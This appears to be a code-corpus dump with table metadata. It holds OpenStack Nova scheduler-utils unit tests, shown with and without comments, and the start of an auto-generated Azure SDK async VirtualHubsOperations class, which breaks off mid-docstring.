right += 1
return length if length != sys.maxsize else 0
| true | true |
1c305d726d065f431ad67bbbb2f5919cb49ed614 | 15,133 | py | Python | nova/tests/unit/scheduler/test_scheduler_utils.py | bopopescu/nested_quota_final | 7c3454883de9f5368fa943924540eebe157a319d | [
"Apache-2.0"
] | 5 | 2017-06-23T07:37:39.000Z | 2020-10-21T07:07:50.000Z | nova/tests/unit/scheduler/test_scheduler_utils.py | bopopescu/nested_quota_final | 7c3454883de9f5368fa943924540eebe157a319d | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/scheduler/test_scheduler_utils.py | bopopescu/nested_quota_final | 7c3454883de9f5368fa943924540eebe157a319d | [
"Apache-2.0"
] | 4 | 2017-06-23T07:37:43.000Z | 2020-12-28T09:57:22.000Z | # Copyright (c) 2013 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For Scheduler Utils
"""
import contextlib
import uuid
import mock
from mox3 import mox
from oslo_config import cfg
from nova.compute import flavors
from nova.compute import utils as compute_utils
from nova import db
from nova import exception
from nova import notifications
from nova import objects
from nova import rpc
from nova.scheduler import utils as scheduler_utils
from nova import test
from nova.tests.unit import fake_instance
from nova.tests.unit.objects import test_flavor
CONF = cfg.CONF
class SchedulerUtilsTestCase(test.NoDBTestCase):
    """Test case for scheduler utils methods."""
    def setUp(self):
        """Install a fake request context shared by every test."""
        super(SchedulerUtilsTestCase, self).setUp()
        self.context = 'fake-context'
    @mock.patch('nova.objects.Flavor.get_by_flavor_id')
    def test_build_request_spec_without_image(self, mock_get):
        """A missing image must become an empty dict in the request spec."""
        image = None
        instance = {'uuid': 'fake-uuid'}
        instance_type = objects.Flavor(**test_flavor.fake_flavor)
        mock_get.return_value = objects.Flavor(extra_specs={})
        self.mox.StubOutWithMock(flavors, 'extract_flavor')
        flavors.extract_flavor(mox.IgnoreArg()).AndReturn(instance_type)
        self.mox.ReplayAll()
        request_spec = scheduler_utils.build_request_spec(self.context, image,
                                                          [instance])
        self.assertEqual({}, request_spec['image'])
    def test_build_request_spec_with_object(self):
        """Instance objects are flattened to plain dicts in the spec."""
        instance_type = objects.Flavor()
        instance = fake_instance.fake_instance_obj(self.context)
        with mock.patch.object(instance, 'get_flavor') as mock_get:
            mock_get.return_value = instance_type
            request_spec = scheduler_utils.build_request_spec(self.context,
                                                              None,
                                                              [instance])
            mock_get.assert_called_once_with()
        self.assertIsInstance(request_spec['instance_properties'], dict)
    def test_set_vm_state_and_notify(self):
        """set_vm_state_and_notify updates the instance in the DB, records
        an instance fault and emits an error notification.

        The mox stubs below form a strict record/replay script; the order
        of the recorded calls is part of the assertion.
        """
        expected_uuid = 'fake-uuid'
        request_spec = dict(instance_properties=dict(uuid='other-uuid'))
        updates = dict(vm_state='fake-vm-state')
        service = 'fake-service'
        method = 'fake-method'
        exc_info = 'exc_info'
        self.mox.StubOutWithMock(compute_utils,
                                 'add_instance_fault_from_exc')
        self.mox.StubOutWithMock(notifications, 'send_update')
        self.mox.StubOutWithMock(db, 'instance_update_and_get_original')
        self.mox.StubOutWithMock(rpc, 'get_notifier')
        notifier = self.mox.CreateMockAnything()
        rpc.get_notifier(service).AndReturn(notifier)
        old_ref = 'old_ref'
        new_ref = 'new_ref'
        inst_obj = 'inst_obj'
        db.instance_update_and_get_original(
            self.context, expected_uuid, updates,
            columns_to_join=['system_metadata']).AndReturn((old_ref, new_ref))
        notifications.send_update(self.context, old_ref, inst_obj,
                                  service=service)
        compute_utils.add_instance_fault_from_exc(
            self.context,
            new_ref, exc_info, mox.IsA(tuple))
        payload = dict(request_spec=request_spec,
                       instance_properties=request_spec.get(
                           'instance_properties', {}),
                       instance_id=expected_uuid,
                       state='fake-vm-state',
                       method=method,
                       reason=exc_info)
        event_type = '%s.%s' % (service, method)
        notifier.error(self.context, event_type, payload)
        self.mox.ReplayAll()
        with mock.patch.object(objects.Instance, '_from_db_object',
                               return_value=inst_obj):
            scheduler_utils.set_vm_state_and_notify(self.context,
                                                    expected_uuid,
                                                    service,
                                                    method,
                                                    updates,
                                                    exc_info,
                                                    request_spec,
                                                    db)
    def _test_populate_filter_props(self, host_state_obj=True,
                                    with_retry=True,
                                    force_hosts=None,
                                    force_nodes=None):
        """Drive populate_filter_properties under the given retry/force
        combination and verify the 'limits' and retry-host bookkeeping.
        """
        if force_hosts is None:
            force_hosts = []
        if force_nodes is None:
            force_nodes = []
        if with_retry:
            if not force_hosts and not force_nodes:
                filter_properties = dict(retry=dict(hosts=[]))
            else:
                filter_properties = dict(force_hosts=force_hosts,
                                         force_nodes=force_nodes)
        else:
            filter_properties = dict()
        # Exercise both shapes the scheduler may pass: an object with
        # attributes or a plain dict.
        if host_state_obj:
            class host_state(object):
                host = 'fake-host'
                nodename = 'fake-node'
                limits = 'fake-limits'
        else:
            host_state = dict(host='fake-host',
                              nodename='fake-node',
                              limits='fake-limits')
        scheduler_utils.populate_filter_properties(filter_properties,
                                                   host_state)
        if with_retry and not force_hosts and not force_nodes:
            # So we can check for 2 hosts
            scheduler_utils.populate_filter_properties(filter_properties,
                                                       host_state)
        if force_hosts:
            expected_limits = None
        else:
            expected_limits = 'fake-limits'
        self.assertEqual(expected_limits,
                         filter_properties.get('limits'))
        if with_retry and not force_hosts and not force_nodes:
            self.assertEqual([['fake-host', 'fake-node'],
                              ['fake-host', 'fake-node']],
                             filter_properties['retry']['hosts'])
        else:
            self.assertNotIn('retry', filter_properties)
    def test_populate_filter_props(self):
        self._test_populate_filter_props()
    def test_populate_filter_props_host_dict(self):
        self._test_populate_filter_props(host_state_obj=False)
    def test_populate_filter_props_no_retry(self):
        self._test_populate_filter_props(with_retry=False)
    def test_populate_filter_props_force_hosts_no_retry(self):
        self._test_populate_filter_props(force_hosts=['force-host'])
    def test_populate_filter_props_force_nodes_no_retry(self):
        self._test_populate_filter_props(force_nodes=['force-node'])
    @mock.patch.object(scheduler_utils, '_max_attempts')
    def test_populate_retry_exception_at_max_attempts(self, _max_attempts):
        """Hitting the retry limit raises NoValidHost with the last error."""
        _max_attempts.return_value = 2
        msg = 'The exception text was preserved!'
        filter_properties = dict(retry=dict(num_attempts=2, hosts=[],
                                            exc=[msg]))
        nvh = self.assertRaises(exception.NoValidHost,
                                scheduler_utils.populate_retry,
                                filter_properties, 'fake-uuid')
        # make sure 'msg' is a substring of the complete exception text
        self.assertIn(msg, nvh.message)
    def _check_parse_options(self, opts, sep, converter, expected):
        """Assert every expected (key, value) pair survives parse_options."""
        good = scheduler_utils.parse_options(opts,
                                             sep=sep,
                                             converter=converter)
        for item in expected:
            self.assertIn(item, good)
    def test_parse_options(self):
        """Malformed entries are dropped; well-formed ones are converted."""
        # check normal
        self._check_parse_options(['foo=1', 'bar=-2.1'],
                                  '=',
                                  float,
                                  [('foo', 1.0), ('bar', -2.1)])
        # check convert error
        self._check_parse_options(['foo=a1', 'bar=-2.1'],
                                  '=',
                                  float,
                                  [('bar', -2.1)])
        # check separator missing
        self._check_parse_options(['foo', 'bar=-2.1'],
                                  '=',
                                  float,
                                  [('bar', -2.1)])
        # check key missing
        self._check_parse_options(['=5', 'bar=-2.1'],
                                  '=',
                                  float,
                                  [('bar', -2.1)])
    def test_validate_filters_configured(self):
        """validate_filter is True only for filters in the configured list."""
        self.flags(scheduler_default_filters='FakeFilter1,FakeFilter2')
        self.assertTrue(scheduler_utils.validate_filter('FakeFilter1'))
        self.assertTrue(scheduler_utils.validate_filter('FakeFilter2'))
        self.assertFalse(scheduler_utils.validate_filter('FakeFilter3'))
    def _create_server_group(self, policy='anti-affinity'):
        """Build a one-member InstanceGroup with the given policy."""
        instance = fake_instance.fake_instance_obj(self.context,
                                                   params={'host': 'hostA'})
        group = objects.InstanceGroup()
        group.name = 'pele'
        group.uuid = str(uuid.uuid4())
        group.members = [instance.uuid]
        group.policies = [policy]
        return group
    def _get_group_details(self, group, policy=None):
        """_get_group_details must merge the group's hosts with the passed
        group_hosts and report the group's policy.
        """
        group_hosts = ['hostB']
        with contextlib.nested(
            mock.patch.object(objects.InstanceGroup, 'get_by_instance_uuid',
                              return_value=group),
            mock.patch.object(objects.InstanceGroup, 'get_hosts',
                              return_value=['hostA']),
        ) as (get_group, get_hosts):
            # Reset the module-level caches so filter support is re-detected.
            scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
            scheduler_utils._SUPPORTS_AFFINITY = None
            group_info = scheduler_utils._get_group_details(
                self.context, 'fake_uuid', group_hosts)
            self.assertEqual(
                (set(['hostA', 'hostB']), [policy]),
                group_info)
    def test_get_group_details(self):
        for policy in ['affinity', 'anti-affinity']:
            group = self._create_server_group(policy)
            self._get_group_details(group, policy=policy)
    def test_get_group_details_with_no_affinity_filters(self):
        """No affinity filters configured -> no group details returned."""
        self.flags(scheduler_default_filters=['fake'])
        scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
        scheduler_utils._SUPPORTS_AFFINITY = None
        group_info = scheduler_utils._get_group_details(self.context,
                                                        'fake-uuid')
        self.assertIsNone(group_info)
    def test_get_group_details_with_no_instance_uuid(self):
        """Without an instance uuid there is no group to look up."""
        self.flags(scheduler_default_filters=['fake'])
        scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
        scheduler_utils._SUPPORTS_AFFINITY = None
        group_info = scheduler_utils._get_group_details(self.context, None)
        self.assertIsNone(group_info)
    def _get_group_details_with_filter_not_configured(self, policy):
        """Configure the *opposite* filter for the policy and expect
        UnsupportedPolicyException.
        """
        wrong_filter = {
            'affinity': 'ServerGroupAntiAffinityFilter',
            'anti-affinity': 'ServerGroupAffinityFilter',
        }
        self.flags(scheduler_default_filters=[wrong_filter[policy]])
        instance = fake_instance.fake_instance_obj(self.context,
                                                   params={'host': 'hostA'})
        group = objects.InstanceGroup()
        group.uuid = str(uuid.uuid4())
        group.members = [instance.uuid]
        group.policies = [policy]
        with contextlib.nested(
            mock.patch.object(objects.InstanceGroup, 'get_by_instance_uuid',
                              return_value=group),
            mock.patch.object(objects.InstanceGroup, 'get_hosts',
                              return_value=['hostA']),
        ) as (get_group, get_hosts):
            scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
            scheduler_utils._SUPPORTS_AFFINITY = None
            self.assertRaises(exception.UnsupportedPolicyException,
                              scheduler_utils._get_group_details,
                              self.context, 'fake-uuid')
    def test_get_group_details_with_filter_not_configured(self):
        policies = ['anti-affinity', 'affinity']
        for policy in policies:
            self._get_group_details_with_filter_not_configured(policy)
    @mock.patch.object(scheduler_utils, '_get_group_details')
    def test_setup_instance_group_in_filter_properties(self, mock_ggd):
        """Group details found -> filter_properties gains the merged hosts
        and the group's policies.
        """
        mock_ggd.return_value = scheduler_utils.GroupDetails(
            hosts=set(['hostA', 'hostB']), policies=['policy'])
        spec = {'instance_properties': {'uuid': 'fake-uuid'}}
        filter_props = {'group_hosts': ['hostC']}
        scheduler_utils.setup_instance_group(self.context, spec, filter_props)
        mock_ggd.assert_called_once_with(self.context, 'fake-uuid',
                                         ['hostC'])
        expected_filter_props = {'group_updated': True,
                                 'group_hosts': set(['hostA', 'hostB']),
                                 'group_policies': ['policy']}
        self.assertEqual(expected_filter_props, filter_props)
    @mock.patch.object(scheduler_utils, '_get_group_details')
    def test_setup_instance_group_with_no_group(self, mock_ggd):
        """No group -> filter_properties is left untouched."""
        mock_ggd.return_value = None
        spec = {'instance_properties': {'uuid': 'fake-uuid'}}
        filter_props = {'group_hosts': ['hostC']}
        scheduler_utils.setup_instance_group(self.context, spec, filter_props)
        mock_ggd.assert_called_once_with(self.context, 'fake-uuid',
                                         ['hostC'])
        self.assertNotIn('group_updated', filter_props)
        self.assertNotIn('group_policies', filter_props)
        self.assertEqual(['hostC'], filter_props['group_hosts'])
    @mock.patch.object(scheduler_utils, '_get_group_details')
    def test_setup_instance_group_with_filter_not_configured(self, mock_ggd):
        """Errors from _get_group_details propagate to the caller."""
        mock_ggd.side_effect = exception.NoValidHost(reason='whatever')
        spec = {'instance_properties': {'uuid': 'fake-uuid'}}
        filter_props = {'group_hosts': ['hostC']}
        self.assertRaises(exception.NoValidHost,
                          scheduler_utils.setup_instance_group,
                          self.context, spec, filter_props)
| 42.508427 | 78 | 0.58574 |
import contextlib
import uuid
import mock
from mox3 import mox
from oslo_config import cfg
from nova.compute import flavors
from nova.compute import utils as compute_utils
from nova import db
from nova import exception
from nova import notifications
from nova import objects
from nova import rpc
from nova.scheduler import utils as scheduler_utils
from nova import test
from nova.tests.unit import fake_instance
from nova.tests.unit.objects import test_flavor
CONF = cfg.CONF
class SchedulerUtilsTestCase(test.NoDBTestCase):
def setUp(self):
super(SchedulerUtilsTestCase, self).setUp()
self.context = 'fake-context'
@mock.patch('nova.objects.Flavor.get_by_flavor_id')
def test_build_request_spec_without_image(self, mock_get):
image = None
instance = {'uuid': 'fake-uuid'}
instance_type = objects.Flavor(**test_flavor.fake_flavor)
mock_get.return_value = objects.Flavor(extra_specs={})
self.mox.StubOutWithMock(flavors, 'extract_flavor')
flavors.extract_flavor(mox.IgnoreArg()).AndReturn(instance_type)
self.mox.ReplayAll()
request_spec = scheduler_utils.build_request_spec(self.context, image,
[instance])
self.assertEqual({}, request_spec['image'])
def test_build_request_spec_with_object(self):
instance_type = objects.Flavor()
instance = fake_instance.fake_instance_obj(self.context)
with mock.patch.object(instance, 'get_flavor') as mock_get:
mock_get.return_value = instance_type
request_spec = scheduler_utils.build_request_spec(self.context,
None,
[instance])
mock_get.assert_called_once_with()
self.assertIsInstance(request_spec['instance_properties'], dict)
def test_set_vm_state_and_notify(self):
expected_uuid = 'fake-uuid'
request_spec = dict(instance_properties=dict(uuid='other-uuid'))
updates = dict(vm_state='fake-vm-state')
service = 'fake-service'
method = 'fake-method'
exc_info = 'exc_info'
self.mox.StubOutWithMock(compute_utils,
'add_instance_fault_from_exc')
self.mox.StubOutWithMock(notifications, 'send_update')
self.mox.StubOutWithMock(db, 'instance_update_and_get_original')
self.mox.StubOutWithMock(rpc, 'get_notifier')
notifier = self.mox.CreateMockAnything()
rpc.get_notifier(service).AndReturn(notifier)
old_ref = 'old_ref'
new_ref = 'new_ref'
inst_obj = 'inst_obj'
db.instance_update_and_get_original(
self.context, expected_uuid, updates,
columns_to_join=['system_metadata']).AndReturn((old_ref, new_ref))
notifications.send_update(self.context, old_ref, inst_obj,
service=service)
compute_utils.add_instance_fault_from_exc(
self.context,
new_ref, exc_info, mox.IsA(tuple))
payload = dict(request_spec=request_spec,
instance_properties=request_spec.get(
'instance_properties', {}),
instance_id=expected_uuid,
state='fake-vm-state',
method=method,
reason=exc_info)
event_type = '%s.%s' % (service, method)
notifier.error(self.context, event_type, payload)
self.mox.ReplayAll()
with mock.patch.object(objects.Instance, '_from_db_object',
return_value=inst_obj):
scheduler_utils.set_vm_state_and_notify(self.context,
expected_uuid,
service,
method,
updates,
exc_info,
request_spec,
db)
def _test_populate_filter_props(self, host_state_obj=True,
with_retry=True,
force_hosts=None,
force_nodes=None):
if force_hosts is None:
force_hosts = []
if force_nodes is None:
force_nodes = []
if with_retry:
if not force_hosts and not force_nodes:
filter_properties = dict(retry=dict(hosts=[]))
else:
filter_properties = dict(force_hosts=force_hosts,
force_nodes=force_nodes)
else:
filter_properties = dict()
if host_state_obj:
class host_state(object):
host = 'fake-host'
nodename = 'fake-node'
limits = 'fake-limits'
else:
host_state = dict(host='fake-host',
nodename='fake-node',
limits='fake-limits')
scheduler_utils.populate_filter_properties(filter_properties,
host_state)
if with_retry and not force_hosts and not force_nodes:
scheduler_utils.populate_filter_properties(filter_properties,
host_state)
if force_hosts:
expected_limits = None
else:
expected_limits = 'fake-limits'
self.assertEqual(expected_limits,
filter_properties.get('limits'))
if with_retry and not force_hosts and not force_nodes:
self.assertEqual([['fake-host', 'fake-node'],
['fake-host', 'fake-node']],
filter_properties['retry']['hosts'])
else:
self.assertNotIn('retry', filter_properties)
def test_populate_filter_props(self):
self._test_populate_filter_props()
def test_populate_filter_props_host_dict(self):
self._test_populate_filter_props(host_state_obj=False)
def test_populate_filter_props_no_retry(self):
self._test_populate_filter_props(with_retry=False)
def test_populate_filter_props_force_hosts_no_retry(self):
self._test_populate_filter_props(force_hosts=['force-host'])
def test_populate_filter_props_force_nodes_no_retry(self):
self._test_populate_filter_props(force_nodes=['force-node'])
@mock.patch.object(scheduler_utils, '_max_attempts')
def test_populate_retry_exception_at_max_attempts(self, _max_attempts):
_max_attempts.return_value = 2
msg = 'The exception text was preserved!'
filter_properties = dict(retry=dict(num_attempts=2, hosts=[],
exc=[msg]))
nvh = self.assertRaises(exception.NoValidHost,
scheduler_utils.populate_retry,
filter_properties, 'fake-uuid')
self.assertIn(msg, nvh.message)
def _check_parse_options(self, opts, sep, converter, expected):
good = scheduler_utils.parse_options(opts,
sep=sep,
converter=converter)
for item in expected:
self.assertIn(item, good)
def test_parse_options(self):
self._check_parse_options(['foo=1', 'bar=-2.1'],
'=',
float,
[('foo', 1.0), ('bar', -2.1)])
self._check_parse_options(['foo=a1', 'bar=-2.1'],
'=',
float,
[('bar', -2.1)])
self._check_parse_options(['foo', 'bar=-2.1'],
'=',
float,
[('bar', -2.1)])
self._check_parse_options(['=5', 'bar=-2.1'],
'=',
float,
[('bar', -2.1)])
def test_validate_filters_configured(self):
self.flags(scheduler_default_filters='FakeFilter1,FakeFilter2')
self.assertTrue(scheduler_utils.validate_filter('FakeFilter1'))
self.assertTrue(scheduler_utils.validate_filter('FakeFilter2'))
self.assertFalse(scheduler_utils.validate_filter('FakeFilter3'))
def _create_server_group(self, policy='anti-affinity'):
instance = fake_instance.fake_instance_obj(self.context,
params={'host': 'hostA'})
group = objects.InstanceGroup()
group.name = 'pele'
group.uuid = str(uuid.uuid4())
group.members = [instance.uuid]
group.policies = [policy]
return group
def _get_group_details(self, group, policy=None):
group_hosts = ['hostB']
with contextlib.nested(
mock.patch.object(objects.InstanceGroup, 'get_by_instance_uuid',
return_value=group),
mock.patch.object(objects.InstanceGroup, 'get_hosts',
return_value=['hostA']),
) as (get_group, get_hosts):
scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
scheduler_utils._SUPPORTS_AFFINITY = None
group_info = scheduler_utils._get_group_details(
self.context, 'fake_uuid', group_hosts)
self.assertEqual(
(set(['hostA', 'hostB']), [policy]),
group_info)
def test_get_group_details(self):
for policy in ['affinity', 'anti-affinity']:
group = self._create_server_group(policy)
self._get_group_details(group, policy=policy)
def test_get_group_details_with_no_affinity_filters(self):
self.flags(scheduler_default_filters=['fake'])
scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
scheduler_utils._SUPPORTS_AFFINITY = None
group_info = scheduler_utils._get_group_details(self.context,
'fake-uuid')
self.assertIsNone(group_info)
def test_get_group_details_with_no_instance_uuid(self):
self.flags(scheduler_default_filters=['fake'])
scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
scheduler_utils._SUPPORTS_AFFINITY = None
group_info = scheduler_utils._get_group_details(self.context, None)
self.assertIsNone(group_info)
def _get_group_details_with_filter_not_configured(self, policy):
wrong_filter = {
'affinity': 'ServerGroupAntiAffinityFilter',
'anti-affinity': 'ServerGroupAffinityFilter',
}
self.flags(scheduler_default_filters=[wrong_filter[policy]])
instance = fake_instance.fake_instance_obj(self.context,
params={'host': 'hostA'})
group = objects.InstanceGroup()
group.uuid = str(uuid.uuid4())
group.members = [instance.uuid]
group.policies = [policy]
with contextlib.nested(
mock.patch.object(objects.InstanceGroup, 'get_by_instance_uuid',
return_value=group),
mock.patch.object(objects.InstanceGroup, 'get_hosts',
return_value=['hostA']),
) as (get_group, get_hosts):
scheduler_utils._SUPPORTS_ANTI_AFFINITY = None
scheduler_utils._SUPPORTS_AFFINITY = None
self.assertRaises(exception.UnsupportedPolicyException,
scheduler_utils._get_group_details,
self.context, 'fake-uuid')
def test_get_group_details_with_filter_not_configured(self):
policies = ['anti-affinity', 'affinity']
for policy in policies:
self._get_group_details_with_filter_not_configured(policy)
@mock.patch.object(scheduler_utils, '_get_group_details')
def test_setup_instance_group_in_filter_properties(self, mock_ggd):
mock_ggd.return_value = scheduler_utils.GroupDetails(
hosts=set(['hostA', 'hostB']), policies=['policy'])
spec = {'instance_properties': {'uuid': 'fake-uuid'}}
filter_props = {'group_hosts': ['hostC']}
scheduler_utils.setup_instance_group(self.context, spec, filter_props)
mock_ggd.assert_called_once_with(self.context, 'fake-uuid',
['hostC'])
expected_filter_props = {'group_updated': True,
'group_hosts': set(['hostA', 'hostB']),
'group_policies': ['policy']}
self.assertEqual(expected_filter_props, filter_props)
@mock.patch.object(scheduler_utils, '_get_group_details')
def test_setup_instance_group_with_no_group(self, mock_ggd):
mock_ggd.return_value = None
spec = {'instance_properties': {'uuid': 'fake-uuid'}}
filter_props = {'group_hosts': ['hostC']}
scheduler_utils.setup_instance_group(self.context, spec, filter_props)
mock_ggd.assert_called_once_with(self.context, 'fake-uuid',
['hostC'])
self.assertNotIn('group_updated', filter_props)
self.assertNotIn('group_policies', filter_props)
self.assertEqual(['hostC'], filter_props['group_hosts'])
@mock.patch.object(scheduler_utils, '_get_group_details')
def test_setup_instance_group_with_filter_not_configured(self, mock_ggd):
mock_ggd.side_effect = exception.NoValidHost(reason='whatever')
spec = {'instance_properties': {'uuid': 'fake-uuid'}}
filter_props = {'group_hosts': ['hostC']}
self.assertRaises(exception.NoValidHost,
scheduler_utils.setup_instance_group,
self.context, spec, filter_props)
| true | true |
1c305da171d9418019b885143f595ffe0a236515 | 33,113 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_06_01/aio/operations/_virtual_hubs_operations.py | beltr0n/azure-sdk-for-python | 2f7fb8bee881b0fc0386a0ad5385755ceedd0453 | [
"MIT"
] | 2 | 2021-03-24T06:26:11.000Z | 2021-04-18T15:55:59.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_06_01/aio/operations/_virtual_hubs_operations.py | beltr0n/azure-sdk-for-python | 2f7fb8bee881b0fc0386a0ad5385755ceedd0453 | [
"MIT"
] | 4 | 2019-04-17T17:57:49.000Z | 2020-04-24T21:11:22.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2020_06_01/aio/operations/_virtual_hubs_operations.py | beltr0n/azure-sdk-for-python | 2f7fb8bee881b0fc0386a0ad5385755ceedd0453 | [
"MIT"
] | 2 | 2021-05-23T16:46:31.000Z | 2021-05-26T23:51:09.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VirtualHubsOperations:
"""VirtualHubsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
    def __init__(self, client, config, serializer, deserializer) -> None:
        # The pipeline client, configuration and (de)serializers are injected
        # by the generated service client; this operations class never
        # constructs them itself.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        self._config = config
    async def get(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        **kwargs
    ) -> "_models.VirtualHub":
        """Retrieves the details of a VirtualHub.
        :param resource_group_name: The resource group name of the VirtualHub.
        :type resource_group_name: str
        :param virtual_hub_name: The name of the VirtualHub.
        :type virtual_hub_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: VirtualHub, or the result of cls(response)
        :rtype: ~azure.mgmt.network.v2020_06_01.models.VirtualHub
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VirtualHub"]
        # Map auth/404/409 status codes to typed azure-core exceptions
        # instead of the generic HttpResponseError raised below.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        accept = "application/json"
        # Construct URL
        url = self.get.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # Only 200 is a documented success for this GET.
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('VirtualHub', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'}  # type: ignore
    async def _create_or_update_initial(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        virtual_hub_parameters: "_models.VirtualHub",
        **kwargs
    ) -> "_models.VirtualHub":
        """Issue the initial PUT of the create-or-update long-running
        operation and return the service's immediate ``VirtualHub``
        payload (200 = updated, 201 = created). Internal: polling is
        handled by :meth:`begin_create_or_update`.
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VirtualHub"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Construct URL
        url = self._create_or_update_initial.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        # Serialize the VirtualHub model as the JSON request body.
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(virtual_hub_parameters, 'VirtualHub')
        body_content_kwargs['content'] = body_content
        request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        # Both success codes carry the same VirtualHub body shape.
        if response.status_code == 200:
            deserialized = self._deserialize('VirtualHub', pipeline_response)
        if response.status_code == 201:
            deserialized = self._deserialize('VirtualHub', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'}  # type: ignore
    async def begin_create_or_update(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        virtual_hub_parameters: "_models.VirtualHub",
        **kwargs
    ) -> AsyncLROPoller["_models.VirtualHub"]:
        """Creates a VirtualHub resource if it doesn't exist else updates the existing VirtualHub.
        :param resource_group_name: The resource group name of the VirtualHub.
        :type resource_group_name: str
        :param virtual_hub_name: The name of the VirtualHub.
        :type virtual_hub_name: str
        :param virtual_hub_parameters: Parameters supplied to create or update VirtualHub.
        :type virtual_hub_parameters: ~azure.mgmt.network.v2020_06_01.models.VirtualHub
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either VirtualHub or the result of cls(response)
